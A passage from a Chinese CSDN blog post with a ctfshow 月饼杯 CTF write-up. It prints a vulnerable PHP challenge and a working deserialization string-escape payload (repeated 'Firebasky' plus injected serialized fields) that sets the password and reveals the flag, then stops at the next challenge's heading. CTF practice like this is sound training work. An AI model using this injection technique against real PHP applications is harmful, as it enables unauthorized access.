ctfshow 月饼杯

web1_此夜圆一个简单的反序列化逃逸<?phperror_reporting(0);class a{ public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->pa
摘要由CSDN通过智能技术生成

web1_此夜圆

一个简单的反序列化逃逸

<?php
error_reporting(0);

class a
{
   
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
   
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup()
	{
   
			if($this->password==='yu22x')
			{
   
				include('flag.php');
				echo $flag;	
			}
			else
			{
   
				echo 'wrong password';
			}
		}
	}

function filter($string){
   
    return str_replace('Firebasky','Firebaskyup',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

这里是我们传进入$uname的值,这是我们唯一可控制的,目的是让password为yu22x
所以,就可以利用这个字符替换来逃逸

这里我们需要逃逸的是这样一个值

";s:8:"password";s:5:"yu22x";}

总共30个字符,然后每次替换就会多出2个字符,所以需要15个Firebasky来进行替换。
所以payload就是

FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}

web2_故人心

<?php
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值